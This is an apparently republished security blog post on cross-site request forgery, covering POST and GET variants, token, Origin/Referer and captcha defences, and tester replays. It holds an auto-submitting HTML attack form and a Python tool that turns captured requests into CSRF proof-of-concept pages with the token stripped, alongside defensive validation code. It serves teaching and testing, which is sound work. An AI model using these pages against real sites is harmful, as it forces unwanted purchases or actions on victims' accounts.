CSRF | About CSRF attacks and how to defend against them: thinking deeply

Posted by l0cm


Editor's note: this article was compiled by the editors of 小常识网 (cha138.com). It covers "CSRF | About CSRF attacks and how to defend against them: thinking deeply" and is offered as reference material.

About CSRF attacks and how to defend against them: thinking deeply

 

About CSRF:

  CSRF (Cross-site request forgery) is something most security people have heard of, and it is often lumped together with XSS because both involve a malicious page and a victim's browser. The mechanics differ: XSS runs attacker script inside the target site's origin, whereas CSRF needs no injection point on the target at all. The attacker's own page makes the victim's browser send a request to the target, and the browser attaches the victim's cookies (or HTTP auth credentials) automatically, so the target sees a valid, authenticated request. Because it needs no foothold on the target and is easy to overlook, some consider it more dangerous than XSS.

Developer Eyes:

  As a developer you need to know which request methods a CSRF attack can use. Roughly, they fall into POST and GET types; in both cases the attacker controls the parameters and the browser supplies the credentials.

About POST request types:

  scenario: paying money to buy a computer

  The purchase endpoint looks like URL: xxx.xxx.xxx/buy.php?id=xxx. If an attacker finds (for example by watching the request in the browser's debugger or an intercepting proxy) that the endpoint accepts the request without any per-session secret, they can construct an HTML POC that submits the same POST from their own page:


<!-- attacker's page: the browser attaches the victim's cookies for xxx.xxx.xxx on its own.
     A plain form can send multipart/form-data, application/x-www-form-urlencoded or
     text/plain cross-site without any CORS preflight, so none of these encodings protect
     the endpoint. -->
<form method="POST" action="xxx.xxx.xxx/buy.php?id=xxx" enctype="multipart/form-data"> 
    <input type="hidden" name="money" value="xxx"/> 
    .....
</form> 
<script> 
    // submit immediately, no click from the victim is needed
    document.forms[0].submit();
</script>


About GET request types:

  scenario: paying money to buy a computer

  The shop returns URL: xxx.xxx.xxx/buy.php?id=xxx&submit_id=1&money=199&user=test. Here the whole purchase is encoded in a GET URL, so the attacker does not even need a form or a script: anything that makes the victim's browser fetch that URL (an <img src=...> tag in a forum post or e-mail, a link, a redirect) completes the purchase with the victim's cookies. State-changing actions should never be reachable by GET.

How do you defend against CSRF in development?

  In general there are three methods: validating an anti-CSRF token, checking the Referer (or Origin) header, and requiring a verification code (captcha) on the sensitive action. Sites like PayPal additionally tie the request to the cookie or session (the token must match the session that sent it), and some simply reject any state-changing request that arrives without an Origin header.
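The checks named above (session-bound token, Origin/Referer check, the "no Origin" rejection, and refusing GET for state changes), as an added example that is not part of the original post and not the code of any real shop. Requests are modelled as plain dicts; SITE_ORIGIN, the request shape, and all function and cookie names are this example's own assumptions. The captcha is the one method not modelled here, since it needs a human in the loop.

```python
# Added example (not from the original post): the checks named above, written
# over constructed request dicts so it runs offline. SITE_ORIGIN, the request
# shape and all function names are this example's own assumptions.
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://shop.example"        # assumed origin of the shop
SESSION_SECRET = secrets.token_bytes(32)     # server-side key, never sent to clients


def make_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session_id).
    It is embedded in the shop's own form; a cross-site page cannot read it."""
    return hmac.new(SESSION_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_token(req: dict) -> bool:
    """Token must be present and must match the token for *this* session."""
    session_id = req["cookies"].get("session")
    token = req["form"].get("csrf_token")
    if not session_id or not token:
        return False
    # constant-time compare so the check itself does not leak the token
    return hmac.compare_digest(make_csrf_token(session_id), token)


def check_origin(req: dict, reject_missing: bool = True) -> bool:
    """Origin/Referer check. Browsers attach Origin to cross-site POSTs and a
    page cannot forge it; fall back to Referer, and treat both missing as
    suspicious when reject_missing is set (the "stop no Origin" policy)."""
    origin = req["headers"].get("Origin")
    if origin is None:
        referer = req["headers"].get("Referer")
        if referer is None:
            return not reject_missing
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def handle_buy(req: dict) -> str:
    """Purchase endpoint: GET is refused outright (so a link or <img src>
    can never spend money), then Origin, then the session-bound token."""
    if req["method"].upper() != "POST":
        return "405 use POST"
    if not check_origin(req):
        return "403 bad origin"
    if not check_token(req):
        return "403 bad token"
    return f"200 bought item {req['form']['id']} for {req['form']['money']}"


VICTIM_SESSION = "sess-victim-1"   # constructed session id


def legitimate_request() -> dict:
    """The shop's own checkout form, submitted by the logged-in victim."""
    return {"method": "POST",
            "headers": {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/checkout"},
            "cookies": {"session": VICTIM_SESSION},
            "form": {"id": "42", "money": "199",
                     "csrf_token": make_csrf_token(VICTIM_SESSION)}}


def forged_post_request() -> dict:
    """What the auto-submitting form on attacker.example produces: the browser
    still attaches the victim's cookie, but Origin is the attacker's and the
    token field is missing because the attacker could not read it."""
    return {"method": "POST",
            "headers": {"Origin": "https://attacker.example"},
            "cookies": {"session": VICTIM_SESSION},
            "form": {"id": "42", "money": "199"}}


def forged_get_request() -> dict:
    """The GET variant: the purchase URL loaded via <img src> from the attacker's page."""
    return {"method": "GET",
            "headers": {"Referer": "https://attacker.example/"},
            "cookies": {"session": VICTIM_SESSION},
            "form": {"id": "42", "money": "199", "submit_id": "1"}}


def same_origin_without_token() -> dict:
    """Origin is right but the token is absent, e.g. the request replayed from a
    proxy with the token stripped: the check a tester makes to see whether the
    server really enforces the token."""
    req = legitimate_request()
    del req["form"]["csrf_token"]
    return req


if __name__ == "__main__":
    for name, build in [("legitimate", legitimate_request),
                        ("forged POST", forged_post_request),
                        ("forged GET", forged_get_request),
                        ("no token", same_origin_without_token)]:
        print(f"{name:12} -> {handle_buy(build())}")
```

Only the legitimate request reaches the 200 branch; every forged variant fails on the first check it trips. The token check uses hmac.compare_digest deliberately: a plain == comparison would make the defence itself a timing oracle. Modern browsers add a further layer with the cookie's SameSite attribute, but an application should not rely on it alone, since it depends on browser defaults rather than on the server.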

How does an attacker find and use CSRF?

  Under certain conditions a tester can find exposed parameter values, then replay some of the URL requests: strip the Referer, drop any token-looking parameter, and try the request with a different user name (or from a different session) to test whether the CSRF protection is actually effective.
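A tester's tool for the POST and GET sections above and for this testing step, added here as an example that is not part of the original post: it turns a captured HTTP request into the auto-submitting HTML POC, or into a bare <img> tag for a GET endpoint, and can drop a suspected anti-CSRF parameter so the replay shows whether the server enforces it. The two captured requests are constructed; shop.example, the parameter names and the function names are this example's own assumptions.

```python
# Added example (not from the original post): build the "HTML POC" from a
# captured request, with the option to drop a suspected anti-CSRF parameter.
# The captures below are constructed; shop.example and the parameter names
# are assumptions.
from html import escape
from urllib.parse import parse_qsl, urlencode, urlsplit


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target URL and form fields.
    Cookies are deliberately ignored: the victim's browser adds them itself."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    base = f"https://{headers.get('host', '')}{parts.path}"
    method = method.upper()
    if method == "GET":
        # a GET form replaces the action's query string with its own fields
        return {"method": method, "url": base,
                "fields": parse_qsl(parts.query, keep_blank_values=True)}
    if method == "POST":
        ctype = headers.get("content-type", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            raise ValueError(f"a plain <form> cannot send {ctype!r}")
        # keep the query on the action (buy.php?id=...); the body becomes hidden inputs
        url = f"{base}?{parts.query}" if parts.query else base
        return {"method": method, "url": url,
                "fields": parse_qsl(body.strip(), keep_blank_values=True)}
    raise ValueError(f"unsupported method {method}")


def csrf_poc(req: dict, drop_fields=()) -> str:
    """Auto-submitting form. drop_fields removes parameters (e.g. a token) so the
    replay shows whether the server actually checks them."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(name)}" value="{escape(value)}"/>'
        for name, value in req["fields"] if name not in drop_fields)
    return (f'<form method="{req["method"]}" action="{escape(req["url"])}">\n'
            f"{inputs}\n</form>\n"
            "<script>document.forms[0].submit();</script>\n")


def img_poc(req: dict) -> str:
    """For a GET endpoint a hidden <img> is enough: no form, no script, and it
    fires when an e-mail or forum post is merely viewed."""
    if req["method"] != "GET":
        raise ValueError("an <img> can only issue GET")
    return f'<img src="{escape(req["url"] + "?" + urlencode(req["fields"]))}" style="display:none">\n'


# constructed captures of the two purchase flows described in the post
GET_CAPTURE = ("GET /buy.php?id=42&submit_id=1&money=199&user=test HTTP/1.1\r\n"
               "Host: shop.example\r\n"
               "Cookie: session=abc123\r\n\r\n")
POST_CAPTURE = ("POST /buy.php?id=42 HTTP/1.1\r\n"
                "Host: shop.example\r\n"
                "Cookie: session=abc123\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n"
                "Content-Length: 39\r\n\r\n"
                "money=199&user=test&csrf_token=deadbeef")

if __name__ == "__main__":
    print(img_poc(parse_raw_request(GET_CAPTURE)))
    # replay the POST with the token stripped: if buy.php still accepts it,
    # the token is decorative and the endpoint is CSRF-vulnerable
    print(csrf_poc(parse_raw_request(POST_CAPTURE), drop_fields=("csrf_token",)))
```

Serve the generated page from a host the target does not trust and open it in a browser that is logged in to the target; the purchase going through without the token (or with another user's name in the form) is the proof. If the replay silently fails in a current browser, check the cookie's SameSite attribute before concluding the endpoint is protected: a Lax or Strict cookie is not sent with a cross-site POST form or with an <img> fetch, which is a browser default rather than a defence the application implemented.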

 

End

  This is the first part, on the defensive side of thinking deeply about CSRF; a later post will cover exploiting CSRF and exposed debug information.
